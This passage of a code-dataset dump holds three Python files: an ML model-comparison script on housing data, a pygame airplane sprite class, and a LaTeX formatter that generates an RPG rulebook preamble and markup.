plt.subplot(122)\nleft = 100\nright = 201\ndist = 50\ninit_size = 2\nfor it in list(range(left, right, dist)):\n print('训练数据样本数目:', it)\n print('候选数据集大小:', np.shape(x_train))\n if it > np.shape(x_train)[0]:\n print('抽样样本点大于数据集本身')\n break\n list_mse_gpr = []\n list_mse_lgb = []\n list_mse_svr = []\n list_w = []\n\n for i in range(5):\n temp_iter = it - init_size\n # 初始化GP的训练数据\n single = 20\n hf_gp, list_w_hf, x_gp, y_gp = a_gpr.creat_gp_model(max_loop=temp_iter, x_init_l=x_train_l, y_init_l=y_train_l,init_num=init_size,\n n_start=1, n_single=single, x_conda=np.array(x_train, ndmin=2), y_conda=np.array(y_train).reshape(-1, 1)\n )\n list_w.append(list_w_hf)\n y_pre_gpr = [a_gpr.predict_mu_var(np.reshape(x_test[k], (1, -1)), hf_gp, re_var=False) for k in range(np.shape(x_test)[0])]\n\n x_train_m, y_train_m = a_gpr.sample_point(x_train, y_train, iter=it, is_init=True)\n # lgm 模型\n # _, x_train_m, _, y_train_m = train_test_split(x_train, y_train, test_size=(it / m))\n model_lgb = lgb.LGBMRegressor()\n model_lgb.fit(x_train_m, np.reshape(y_train_m, (1, -1))[0])\n y_pre_lgb = [model_lgb.predict(np.reshape(x_test[i], (1, -1))) for i in range(np.shape(x_test)[0])]\n\n # svm 模型\n x_train_r, y_train_r = a_gpr.sample_point(x_train, y_train, iter=it, is_init=True)\n # _, x_train_r, _, y_train_r = train_test_split(x_train, y_train, test_size=(it / m))\n\n model_svr = SVR()\n model_svr.fit(x_train_r, np.reshape(y_train_r, (1, -1))[0])\n y_pre_svr = [model_svr.predict(np.reshape(x_test[i], (1, -1))) for i in range(np.shape(x_test)[0])]\n\n list_mse_gpr.append(mean_squared_error(y_test, y_pre_gpr))\n list_mse_lgb.append(mean_squared_error(y_test, y_pre_lgb))\n list_mse_svr.append(mean_squared_error(y_test, y_pre_svr))\n\n list_mean_mse_gpr.append(np.mean(list_mse_gpr))\n list_mean_mse_lgb.append(np.mean(list_mse_lgb))\n list_mean_mse_svr.append(np.mean(list_mse_svr))\n\n list_average = np.mean(list_w, axis=0)\n plt.sca(ax_1)\n plt.plot(list_average, lw=1.5, label='%s-st' % str(it))\n\n\nplt.axis('tight')\nplt.legend(loc=0)\nplt.ylabel('w_hf')\nplt.xlabel('iter')\nplt.title('boston_price')\n\nplt.sca(ax_2)\nplt.plot(list(range(left, right, dist)), list_mean_mse_lgb, lw=1.5, label='lgb_m')\nplt.plot(list(range(left, right, dist)), list_mean_mse_gpr, lw=1.5, label='gpr_m')\nplt.plot(list(range(left, right, dist)), list_mean_mse_svr, lw=1.5, label='svr_m')\nplt.axis('tight')\nplt.legend(loc=0) # 图例位置自动\nplt.ylabel('MSE')\nplt.xlabel('iter')\nplt.title('boston_price')\n\n\nprint('gpm', list_mean_mse_gpr)\nprint('lgb', list_mean_mse_lgb)\nprint('svr', list_mean_mse_svr)\n\nplt.show()\n\n'''\n\n\ndef pre_gp_mu_var(x_new, model, return_var=False):\n if return_var:\n mu, var = model.predict(x_new)\n return mu[0, 0], var[0, 0]\n else:\n mu, _ = model.predict(x_new)\n return mu[0, 0]\n\nx_train_r, y_train_r = a_gpr.sample_point(x_train, y_train, iter=200, is_init=True)\n\nk_rbf = RBF(input_dim=n, variance=0.5, lengthscale=1)\ngp_model = GPRegression(x_train_r, np.reshape(y_train_r, (-1, 1)), kernel=k_rbf)\ngp_model.optimize(messages=False)\n\nx_train_m, y_train_m = a_gpr.sample_point(x_train, y_train, iter=200, is_init=True)\n\nmodel_lgb = lgb.LGBMRegressor()\nmodel_lgb.fit(x_train_r, np.reshape(y_train_r, (1, -1))[0])\n\nx_train_p, y_train_p = a_gpr.sample_point(x_train_m, y_train_m, iter=200, is_init=True)\n\nmodel_svr = SVR()\nmodel_svr.fit(x_train_p, np.reshape(y_train_p, (1, -1))[0])\n\n\ny_pre_con = [pre_gp_mu_var(np.reshape(x_test[i], (1, -1)), gp_model) for i in range(np.shape(x_test)[0])]\ny_pre_lgb = [model_lgb.predict(np.reshape(x_test[i], (1, -1))) for i in range(np.shape(x_test)[0])]\ny_pre_svr = [model_svr.predict(np.reshape(x_test[i], (1, -1))) for i in range(np.shape(x_test)[0])]\nprint(y_pre_con)\nprint('mse_con:', mean_squared_error(y_test, y_pre_con))\nprint('mse_lgb:', mean_squared_error(y_test, y_pre_lgb))\nprint('mse_svr:', mean_squared_error(y_test, y_pre_svr))\n\n\n\n'''\n", "sub_path": "coding/ABO/cccp.py", "file_name": "cccp.py", "file_ext": "py", "file_size_in_byte": 5868, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 16, "usage_type": "call"}, {"api_name": "coding.ABO.AGPR.A_GPR", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 42, "usage_type": "call"}, {"api_name": "random.gauss", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 80, "usage_type": "call"}, {"api_name": "lightgbm.LGBMRegressor", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.svm.SVR", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 98, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.sca", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.sca", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}]} +{"seq_id": "450527581", "text": "import pygame\n\nclass Airplane():\n #初始化飞机\n\n def __init__(self,screen):\n self.screen = screen\n\n #加载飞机图像并获取其外接矩形\n self.image = pygame.image.load(r'images\\airplane.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n\n #初始化飞机位置\n self.rect.centerx = self.screen_rect.centerx\n self.rect.bottom = self.screen_rect.bottom\n\n #初始化飞机移动标志\n self.m_right = False\n self.m_left = False\n\n #初始化飞机运动位置\n self.center = float(self.rect.centerx)\n\n def blitme(self,speed):\n #更新飞机运动信息\n if self.m_right and self.rect.right < self.screen_rect.right:\n self.center += speed\n if self.m_left and self.rect.left > 0:\n self.center -= speed\n self.rect.centerx = self.center\n \n #绘制飞机\n self.screen.blit(self.image,self.rect)\n\n def center_plane(self):\n #飞机复位\n\n self.image = pygame.image.load(r'images\\airplane.bmp')\n self.rect.centerx = self.screen_rect.centerx\n", "sub_path": "World War II - Air Force/airplane.py", "file_name": "airplane.py", "file_ext": "py", "file_size_in_byte": 1174, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 39, "usage_type": "attribute"}]} +{"seq_id": "258167303", "text": " # coding=utf8\nfrom zope.interface import Interface, implements\nfrom zope.interface.verify import verifyObject\n\nfrom i_formatter import IFormatter\nimport settings\n\n\n## import re\n## _whitespace_regex = re.compile(\"[ \\t]+\")\n## def strip_ws(text):\n## \"\"\"\n## Latex is white space sensitive .. so strip any whitespace from the raw xml\n## (as xml is whitespace agnostic).\n\n## Leaves the line feeds in to keep the line numbers the same for debugging ??\n\n## \"\"\"\n## #return \" \".join(text.split())\n## return _whitespace_regex.sub(\" \", text)\n\n\ndef strip_ws(text):\n \"\"\"\n Latex is white space sensitive .. so strip any whitespace from the raw xml\n (as xml is whitespace agnostic).\n\n Leaves the line feeds in to keep the line numbers the same for debugging ??\n\n \"\"\"\n return \" \".join(text.split())\n\n\n\n\nclass LatexFormatter:\n #implements(IFormatter)\n \n def __init__(self, latex_file):\n\n # open latex file pointer\n self.latex_file = latex_file\n \n # internal state\n self._drop_capped_first_letter_of_chapter = False\n\n # for tables\n self._number_of_columns_in_table = 0\n self._current_column_in_table = 0\n self._current_row_in_table = 0\n\n # for level tables\n self._current_row_in_level_table = 0\n\n #\n # configuration\n # \n return\n\n def verify(self):\n verifyObject(IFormatter, self)\n return\n\n def no_op(self, obj):\n \"\"\"We've got a lot of handlers that don't need to do anything.. do nothing once.\"\"\"\n pass\n\n \n def start_book(self, book):\n \n # must be a valid latex paper size\n if settings.paper_size == \"a4\":\n paper_size = \"a4paper\"\n elif settings.paper_size == \"letter\":\n paper_size = \"letterpaper\"\n else:\n raise Exception(\"Unknown paper size. Pick one of [a4, letter] in settings.py\")\n \n self.latex_file.write(\n \"\\\\documentclass[\" + paper_size + \",twocolumn,oneside]{book}\\n\" \n \"\\n\"\n \"\\\\usepackage{fancyhdr} % header control\\n\" \n \"\\\\usepackage{fancybox} % fancy boxes.. eg box outs\\n\" \n \"\\\\usepackage{graphicx} % for including images\\n\" \n \"\\\\usepackage{fontspec} % fine font control\\n\"\n \"\\\\usepackage{color} % color.. what can I say\\n\"\n \"\\\\usepackage{titlesec} % for fancy titles\\n\"\n \"\\\\usepackage{lettrine} % for drop capitals \\n\" \n\n \"\\\\usepackage{tabularx} % for tables \\n\" \n \"\\\\usepackage[table]{xcolor} % for tables with colour\\n\"\n \"\\\\usepackage{booktabs} % for tables\\n\"\n \"\\\\usepackage{calc} % for table width calculations\\n\"\n #\"\\\\usepackage{longtable} % for long tables (surprise!)\\n\"\n\n \"\\\\usepackage{wasysym} % for checked box\\n\"\n \n\n \"\\\\usepackage{xcolor} % for color aliases\\n\" \n \"\\\\usepackage{wallpaper} % for the paper background\\n\" \n \"\\\\usepackage{enumerate} % for roman numerals in enumerations\\n\" \n \"\\\\usepackage{lipsum} % for generating debug text\\n\"\n \"\\\\usepackage{wrapfig} % sidebar thingy\\n\"\n \"\\\\usepackage{makeidx} % for building the index\\n\"\n\n \n #\"\\\\usepackage{tcolorbox}\\n\"\n ## \"%\\\\newenvironment{wraptext}[1][r]\"\n ## \"%{\\\\wrapfigure{#1}{0.5\\\\textwidth}\\\\tcolorbox}\"\n ## \"%{\\\\endtcolorbox\\\\endwrapfigure}\\n\" \n ## \"\\n\"\n ## \"%\\\\newenvironment{wraptext}[1][r]\"\n ## \"%{\\\\wrapfigure{#1}{0.5\\\\textwidth}\\\\begin{tcolorbox}}\"\n ## \"%{\\\\end{tcolorbox}\\\\endwrapfigure}\\n\" \n ## \"\\n\"\n ## \"%\\\\newenvironment{wraptext}[1][r]\"\n ## \"%{\\\\wrapfigure{#1}{0.5\\\\textwidth}}\"\n ## \"%{\\\\endwrapfigure}\\n\"\n\n ## \"\\n\"\n ## \"\\\\newenvironment{rpgtable}{\\n\" \n ## \" \\\\centering\\n\"\n ## \" \\\\table\\n\"\n ## \"}\\n\"\n ## \"{\\n\"\n ## \" \\\\endtable\\n\"\n ## \"}\\n\"\n\n\n \"\\n\"\n \"\\n\"\n \"% fonts\\n\"\n \"\\\\newfontfamily{\\\\rim}[Scale=1.5]{Rat Infested Mailbox}\\n\"\n \"%\\\\newfontfamily{\\\\eng}[Scale=1.5]{English Gothic, 17th c.}\\n\"\n \"\\\\newfontfamily{\\\\dz}[Scale=2.5]{Deutsche Zierschrift}\\n\"\n \"\\\\newfontfamily{\\\\tkaqf}[Scale=2.5]{the King & Queen font}\\n\"\n \"\\\\newfontfamily{\\\\cloisterblack}{Cloister Black}\\n\"\n \"\\n\"\n \"\\\\newfontfamily{\\\\rpgtitlefont}[Scale=10.0]{Dogma}\\n\"\n \"\\\\newfontfamily{\\\\rpgchapterfont}[Scale=1.0]{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgsectionfont}{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgtableheaderfont}{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgdropcapfont}[Scale=1.2]{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgtitleauthorfont}{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgtitlesubtitlefont}{Cloister Black}\\n\"\n \"\\n\"\n \"% colours \\n\"\n \"\\\\definecolor{maroon}{RGB}{128,0,0}\\n\"\n \"\\\\definecolor{darkred}{RGB}{139,0,0}\\n\"\n \"\\\\definecolor{barnred}{RGB}{124,10,2}\\n\"\n \"\\\\definecolor{rosetaupe}{RGB}{144,93,93}\\n\"\n \"\\\\definecolor{rosewood}{RGB}{101,0,11}\\n\"\n \"\\\\definecolor{black}{RGB}{0,0,0}\\n\"\n \"\\n\"\n \"% colour aliases\\n\"\n \"\\\\colorlet{rpgtitlefontcolor}{black}\\n\"\n \"\\\\colorlet{rpgchapterfontcolor}{black}\\n\"\n \"\\\\colorlet{rpgsectionfontcolor}{rosewood}\\n\"\n \"\\\\colorlet{rpgtableheaderfontcolor}{black}\\n\"\n \"\\n\"\n \"\\n\"\n \"% spacing \\n\" \n \"\\\\newlength\\drop\\n\"\n \"\\\\drop = 0.01\\\\textheight % drop is a vspace 1/100th the page text height.\\n\"\n \"\\n\"\n \"% header formatting\\n\"\n \"\\\\titleformat{\\\\chapter}[hang]\\n\"\n \" {\\\\Huge\\\\bfseries\\\\rpgchapterfont\\\\color{rpgchapterfontcolor}}\\n\"\n \" {\\\\thechapter}{0.5em}{}\\n\"\n \"\\n\"\n \"\\\\titleformat{name=\\\\chapter,numberless}[hang]\\n\"\n \" {\\\\Huge\\\\bfseries\\\\rpgchapterfont\\\\color{rpgchapterfontcolor}}\\n\"\n \" {}{1em}{}\\n\"\n \"\\n\"\n \"\\\\titleformat{\\\\section}\\n\"\n \" {\\\\rpgsectionfont\\\\Large\\\\bfseries\\\\color{rpgsectionfontcolor}}\\n\"\n \" {\\\\thesection}{0.5em}{}\\n\"\n \"\\n\"\n \"\\\\newcommand{\\\\rpgtableheader}\\n\"\n \" {\\\\rpgtableheaderfont\\\\bfseries\\\\color{rpgtableheaderfontcolor}}\"\n \" {}\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n\n\n ## \"\\\\usepackage{rotating}\\n\"\n ## \"\\\\usepackage[first=-8,last=8]{lcg}\\n\"\n ## \"\\makeatletter\\n\"\n ## \"\\\\newcommand{\\\\globalrand}{\\\\rand\\\\global\\\\cr@nd\\\\cr@nd}\\n\"\n ## \"\\\\makeatother\\n\"\n ## \"\\\\newcommand{\\\\easteregg}[1]{%\\n\"\n ## \"\\\\expandafter\\\\let\\\\csname old\\\\string#1\\\\endcsname#1%\\n\"\n ## \"\\\\expandafter\\\\def\\\\expandafter#1\\\\expandafter##\\\\expandafter1\\\\expandafter{%\\n\"\n ## \"\\\\csname old\\\\string#1\\\\endcsname{\\\\protect\\\\globalrand\\\\protect\\\\turnbox{\\n\"\n ## \"\\\\value{rand}}{##1}\\\\protect\\\\phantom{##1}}}%\\n\"\n ## \"}\\n\"\n ## \"\\\\easteregg\\\\emph\\n\"\n \"\\n\" \n \"% the font for the body of the text\\n\"\n # \\fontspec[Mapping=tex-text, Ligatures={Common, Rare, Historic}]{Hoefler Text}\n # this works..\n #\"\\\\fontspec[Mapping=tex-text, Ligatures={Common, Rare}]{Cloister Black}\\n\"\n #\"\\\\setmainfont[Ligatures={Common, Rare}]{TeX Gyre Pagella}\\n\"\n\n #\"\\\\setmainfont[Ligatures={Common, Rare}]{TeX Gyre Pagella}\\n\"\n\n #\"\\\\defaultfontfeatures{Mapping=tex-text,Scale=MatchLowercase}\\n\"\n #\"\\\\setmainfont[Scale=0.95]{TeX Gyre Pagella}\\n\"\n #\"\\\\setmainfont[Scale=0.95]{Hoefler Text}\\n\"\n \"\\\\setmainfont[Scale=0.95]{Linux Libertine O}\\n\"\n \"\\\\setromanfont[Mapping=tex-text, Numbers=OldStyle, Contextuals=Swash, Ligatures=Historical]{Linux Libertine O}\\n\"\n #\"\\\\addfontfeature{Ligatures=Historical}\\n\"\n #\"\\\\addfontfeature{Ligatures=Historical}\\n\"\n #\"\\\\addfontfeature{Ligatures=Rare}\\n\"\n #\"\\\\addfontfeature{Contextuals=cswh}\\n\"\n \"\\\\setmonofont{TeX Gyre Pagella}\\n\" \n \"\\n\"\n \"% special bullet symbols\\n\"\n \"\\\\newcommand{\\\\rpgbullet}\\n\"\n \"{\\n\"\n \" \\\\begingroup\\n\"\n \" \\\\fontspec{WWDesigns}\\n\"\n \" \\\\large\\n\"\n \" \\\\selectfont\\n\"\n \" \\\\char\\\"0043\"\n \" \\\\endgroup\\n\"\n \"}\\n\"\n \"\\\\renewcommand{\\\\labelitemi}{\\\\rpgbullet}\\n\"\n \"\\n\"\n \"% special provenance symbol\\n\"\n \"\\\\newcommand{\\\\rpgprovenancesymbol}\\n\"\n \"{\\n\"\n \" \\\\begingroup\\n\"\n \" \\\\fontspec{WWDesigns}\\n\"\n \" \\\\Large\\n\"\n \" \\\\selectfont\\n\"\n \" \\\\char\\\"0041\"\n \" \\\\endgroup\\n\"\n \"}\\n\"\n \"\\n\"\n \"% scroll flourish divider symbol\\n\"\n \"\\\\newcommand{\\\\rpgdividersymbol}\\n\"\n \"{\\n\"\n #\" \"\n \" \\\\begingroup\\n\"\n \" \\\\fontspec{old retro labels tfb}\\n\"\n #\" \\\\fontsize{82pt}{14pt}\\\\selectfont\"\n \" \\\\Huge\\n\"\n \" \\\\selectfont\\n\"\n \" \\\\char\\\"006E\"\n \" \\\\endgroup\\n\"\n \"}\\n\"\n \"\\n\"\n \"\\n\"\n \"% combat symbol - a sword\\n\"\n \"\\\\newcommand{\\\\rpgcombatsymbol}{$\\\\dagger$}\\n\"\n \"\\n\"\n \"% training symbol\\n\"\n \"\\\\newcommand{\\\\rpgtrainingsymbol}{$\\\\otimes$}\\n\"\n \"\\n\"\n \"% learning symbols\\n\"\n \"\\\\newcommand{\\\\rpglearningsymbol}{$\\Psi$}\\n\" \n \"\\n\"\n \"% success symbols\\n\"\n \"\\\\newcommand{\\\\rpgsuccess}{\\\\CheckedBox}\\n\" \n \"\\n\"\n \"% fail symbols\\n\"\n \"\\\\newcommand{\\\\rpgfail}{\\\\XBox}\\n\" \n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"% the index \\n\"\n \"\\\\makeindex\\n\" \n \"\\n\"\n # start other evironments in newenvironments like this \n # put it after a section, not just before\n \"\\n\"\n \"\\\\newenvironment{playexample}{\\n\" \n \" \\\\centering\\n\"\n \" \\\\figure\\n\" \n #\" \\\\wrapfigure{o}{0.4\\\\textwidth}\\n\" \n \" \\\\hrule \\\\ \\n\"\n #\" \\\\rpgdividersymbol\\n\"\n #\" \\\\begin{center}XXXXX\\\\end{center} \\\\\\n\"\n #\" \\\\begin{center} \\\\hline \\\\end{center} \\\\\\n\"\n #\" {\\\\centering XXXXX }\\n\"\n #\" {\\\\centering x\\\\rpgdividersymbol }\\n\"\n \" \\\\small\\n\"\n \" \\\\cloisterblack\\n\"\n #\" \\\\tcolorbox\\n\" \n #\" \\\\centering\\n\"\n #\"{ \\\\begin{wrapfigure}{R}{0.5\\\\textwidth} \"\n #\" \\\\begin{minipage}{0.45\\\\textwidth} \"\n #\" \\\\begin{tcolorbox}\"\n \"}\\n\"\n \"{\\n\"\n #\" \\\\dag\\n\"\n #\" \\\\endtcolorbox\\n\"\n #\" \\\\end{tcolorbox} \"\n #\" \\\\end{minipage}\"\n #\" \\\\centering \\\\\\\\ \\\\rpgdividersymbol \\\\\\\\ \\n\"\n #\" \\\\makebox[\\textwidth]{\\rule{200cm}{0.4pt}} \n #\" \\\\makebox[\\\\linewidth]{\\\\centering \\\\rpgdividersymbol}\\n\"\n \" \\\\ \\\\hrule \\n\"\n #\" \\\\center \\\\rpgdividersymbol \\\\\\\\ \\\\endcenter \\n\"\n #\" \\\\endwrapfigure\\n\"\n \" \\\\endfigure\\n\"\n #\" \\\\leavevmode\\n\"\n \"}\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"% the document! \\n\"\n \"\\\\begin{document}\\n\"\n \"\\n\")\n\n if settings.display_page_background:\n self.latex_file.write(\n \"\\n\"\n \"% use a background image\\n\"\n \"\\\\CenterWallPaper{1.0}{./resources/paper_\" + paper_size + \".jpg}\"\n \"\\n\\n\")\n \n return\n\n\n def end_book(self, book):\n self.latex_file.write(\"\\\\end{document}\\n\") \n return\n\n\n # \\printindex % Skriver ut index listan i dokumentet \n\n\n def start_appendix(self, appendix):\n self.latex_file.write(\"\\\\appendix\\n\"\n \"\\\\addcontentsline{toc}{chapter}{APPENDICES}\\n\")\n return\n end_appendix = no_op\n\n\n def start_ability(self, ability):\n title_element = ability.find(\"abilitytitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n\n self.latex_file.write(\"\\\\subsubsection{%s}\\n\" % title) \n return\n\n def end_ability(self, ability):\n return\n\n def start_subsubsection(self, subsubsection):\n title_element = subsubsection.find(\"subsubsectiontitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n\n self.latex_file.write(\"\\\\subsubsection{%s}\\n\" % title) \n return\n\n #def end_subsubsection(self, subsubsection):\n # return\n end_subsubsection = no_op\n\n\n ## def start_ability_title(self, ability_title):\n ## return\n \n ## def end_ability_title(self, ability_title):\n ## return\n\n\n start_ability_group = no_op\n def end_ability_group(self, ability_group):\n #self.latex_file.write(\"%s\\n\" % strip_ws(ability_group.text))\n self.latex_file.write(\"%s\\n\" % strip_ws(ability_group.text))\n return\n\n start_ability_class = no_op\n def end_ability_class(self, ability_class):\n self.latex_file.write(\"%s\\n\" % strip_ws(ability_class.text))\n return\n\n start_action_points = no_op\n def end_action_points(self, action_points):\n self.latex_file.write(\"%s\\n\" % strip_ws(action_points.text))\n return\n\n\n def start_index(self, index):\n self.latex_file.write(\"\\\\clearpage\\n\") \n self.latex_file.write(\"\\\\addcontentsline{toc}{chapter}{Index}\\n\") \n self.latex_file.write(\"\\\\printindex\\n\") \n return\n end_index = no_op\n\n\n def start_section(self, section):\n title_element = section.find(\"sectiontitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n\n self.latex_file.write(\"\\\\section{%s}\\n\" % title) \n return\n end_section = no_op\n\n\n def start_subsection(self, subsection):\n title_element = subsection.find(\"subsectiontitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n\n self.latex_file.write(\"\\\\subsection{%s}\\n\" % title) \n return\n\n def end_subsection(self, subsection): \n return\n\n start_subsection_title = no_op\n end_subsection_title = no_op\n\n start_subsubsection_title = no_op\n end_subsubsection_title = no_op\n\n def start_playexample(self, playexample):\n self.latex_file.write(\"\\\\begin{playexample}\\n\")\n return\n\n def end_playexample(self, playexample):\n self.latex_file.write(playexample.text) \n self.latex_file.write(\"\\\\end{playexample}\\n\") \n return\n\n\n ## def start_skill(self, skill):\n ## title_element = skill.find(\"skilltitle\")\n ## if title_element is None:\n ## title = \"\"\n ## else:\n ## title = title_element.text\n\n ## self.latex_file.write(\"\\\\subsection*{%s}\\n\" % title)\n ## return\n\n ## def end_skill(self, skill): \n ## return\n\n ## def start_skill_title(self, skill_title):\n ## return\n\n ## def end_skill_title(self, skill_title):\n ## return\n\n\n\n def start_level_progression_table(self, element):\n self._current_row_in_level_table = 0\n self.latex_file.write(\n \"\\\\begin{tabularx}{0.9\\\\linewidth}{\"\n \"p{\\\\widthof{10000}}p{\\\\widthof{30}}X\"\n \"} \\\\\\\\ \\n\"\n \"\\\\bottomrule \\n\"\n \"\\\\rpgtableheader{Level} & \"\n \"\\\\rpgtableheader{XP} & \"\n \"\\\\rpgtableheader{Description} \\\\\\\\ \\n\")\n return\n \n def end_level_progression_table(self, element):\n self.latex_file.write(\"\\\\bottomrule \\n\"\n \"\\\\end{tabularx}\\n\"\n \"\\n\")\n return\n \n def start_level(self, level):\n self._current_row_in_level_table += 1\n #self,la\n if self._current_row_in_level_table % 2 == 1: \n self.latex_file.write(\"\\\\rowcolor{blue!20} \\n\")\n else:\n self.latex_file.write(\"\\\\rowcolor{white!20} \\n\")\n return\n \n def end_level(self, level):\n self.latex_file.write(\" \\\\\\\\\\n\")\n return \n \n def start_level_xp(self, element):\n self.latex_file.write(\" %s &\" % element.text)\n return \n end_level_xp = no_op\n \n def start_level_number(self, element):\n self.latex_file.write(\" %s &\" % element.text)\n return \n end_level_number = no_op\n\n def start_level_combat(self, element):\n self.latex_file.write(\"\\\\rpgcombatsymbol %s \" % element.text)\n return \n end_level_combat = no_op\n\n def start_level_training(self, element):\n self.latex_file.write(\"\\\\rpgtrainingsymbol %s \" % element.text)\n return \n end_level_training = no_op\n\n def start_level_learning(self, element):\n self.latex_file.write(\"\\\\rpglearningsymbol %s \" % element.text)\n return \n end_level_learning = no_op\n \n def start_level_description(self, element):\n self.latex_file.write(\" %s \" % element.text)\n return\n\n def end_level_description(self, element):\n pass\n\n\n def start_title_page(self, chapter):\n self.latex_file.write(\"\\\\begin{titlepage}\\n\"\n \"\\\\begin{center}\\n\")\n return\n\n def end_title_page(self, chapter):\n self.latex_file.write(\"\\\\end{center}\\n\"\n \"\\\\end{titlepage}\\n\")\n return\n\n\n def start_emph(self, emph):\n return\n\n def end_emph(self, emph):\n self.latex_file.write(\"\\\\emph{%s}\" % strip_ws(emph.text))\n #self.latex_file.write(\"\\\\emph{%s}%s\" % (strip_ws(emph.text), emph.tail))\n return\n\n\n def handle_text(self, text):\n if text is 